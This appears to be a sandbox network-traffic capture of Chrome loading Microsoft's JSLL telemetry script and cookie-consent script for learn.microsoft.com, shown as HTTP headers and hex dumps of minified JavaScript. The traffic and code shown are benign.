                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                Referer: https://learn.microsoft.com/
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                2024-11-23 15:53:48 UTC896INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:53:47 GMT
                                                                                                                                                                                                Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                Content-Length: 207935
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                                Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                                ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                                x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                                x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                x-azure-ref: 20241123T155347Z-178bfbc474bnwsh4hC1NYC2ubs00000004ug0000000031hb
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache-Info: L2_T2
                                                                                                                                                                                                X-Cache: TCP_REMOTE_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:53:48 UTC15488INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                                Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                                2024-11-23 15:53:48 UTC16384INData Raw: 22 2b 74 5d 29 3f 6e 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26
                                                                                                                                                                                                Data Ascii: "+t])?n(i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&
                                                                                                                                                                                                2024-11-23 15:53:48 UTC16384INData Raw: 74 69 6f 6e 20 67 63 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75
                                                                                                                                                                                                Data Ascii: tion gc(e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,fu
                                                                                                                                                                                                2024-11-23 15:53:48 UTC16384INData Raw: 29 2c 68 28 29 2c 6d 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f
                                                                                                                                                                                                Data Ascii: ),h(),m(e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reaso
                                                                                                                                                                                                2024-11-23 15:53:48 UTC16384INData Raw: 28 7b 4e 6f 72 6d 61 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74
                                                                                                                                                                                                Data Ascii: ({Normal:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}ret
                                                                                                                                                                                                2024-11-23 15:53:48 UTC16384INData Raw: 28 6f 2c 22 41 75 74 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75
                                                                                                                                                                                                Data Ascii: (o,"Auto track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=fu
                                                                                                                                                                                                2024-11-23 15:53:48 UTC16384INData Raw: 63 6f 6e 66 69 67 2e 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73
                                                                                                                                                                                                Data Ascii: config.coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._s
                                                                                                                                                                                                2024-11-23 15:53:48 UTC16384INData Raw: 65 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74
                                                                                                                                                                                                Data Ascii: e)return!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t
                                                                                                                                                                                                2024-11-23 15:53:48 UTC16384INData Raw: 67 3d 22 57 65 62 41 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22
                                                                                                                                                                                                Data Ascii: g="WebAuthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split"
                                                                                                                                                                                                2024-11-23 15:53:48 UTC16384INData Raw: 61 28 65 5b 6d 76 5d 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f
                                                                                                                                                                                                Data Ascii: a(e[mv])),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                12192.168.2.44976713.107.246.634435824C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:53:48 UTC551OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                                Host: wcpstatic.microsoft.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                Referer: https://learn.microsoft.com/
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                2024-11-23 15:53:48 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:53:48 GMT
                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                Content-Length: 52717
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                Age: 31694
                                                                                                                                                                                                Cache-Control: max-age=43200
                                                                                                                                                                                                Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                                Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                                Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-request-id: 3774b461-701e-003c-4476-3de918000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-azure-ref: 20241123T155348Z-174c587ffdf4zw2thC1TEBu340000000036g00000000deky
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:53:48 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                                2024-11-23 15:53:48 UTC712INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                                                Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                                                2024-11-23 15:53:48 UTC16383INData Raw: 61 2d 6c 61 62 65 6c 3d 22 27 2b 69 2e 65 73 63 61 70 65 48 74 6d 6c 28 74 68 69 73 2e 74 65 78 74 52 65 73 6f 75 72 63 65 73 2e 70 72 65 66 65 72 65 6e 63 65 73 44 69 61 6c 6f 67 43 6c 6f 73 65 4c 61 62 65 6c 29 2b 27 22 20 63 6c 61 73 73 3d 22 27 2b 61 2e 63 6c 6f 73 65 4d 6f 64 61 6c 49 63 6f 6e 2b 27 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e 26 23 78 32 37 31 35 3b 3c 2f 62 75 74 74 6f 6e 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 64 6f 63 75 6d 65 6e 74 22 20 63 6c 61 73 73 3d 22 27 2b 61 2e 6d 6f 64 61 6c 42 6f 64 79 2b 27 22 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 27 2b 61 2e 6d 6f
                                                                                                                                                                                                Data Ascii: a-label="'+i.escapeHtml(this.textResources.preferencesDialogCloseLabel)+'" class="'+a.closeModalIcon+'" tabindex="0">&#x2715;</button>\n <div role="document" class="'+a.modalBody+'">\n <div>\n <h1 class="'+a.mo
                                                                                                                                                                                                2024-11-23 15:53:48 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f
                                                                                                                                                                                                Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-butto
                                                                                                                                                                                                2024-11-23 15:53:48 UTC3567INData Raw: 28 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61 6e
                                                                                                                                                                                                Data Ascii: ("-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChan


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                13192.168.2.44977313.107.246.634435824C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:53:51 UTC370OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                                Host: js.monitor.azure.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                2024-11-23 15:53:51 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:53:51 GMT
                                                                                                                                                                                                Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                Content-Length: 207935
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                                Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                                ETag: 0x8DCEC757C1AD1D1
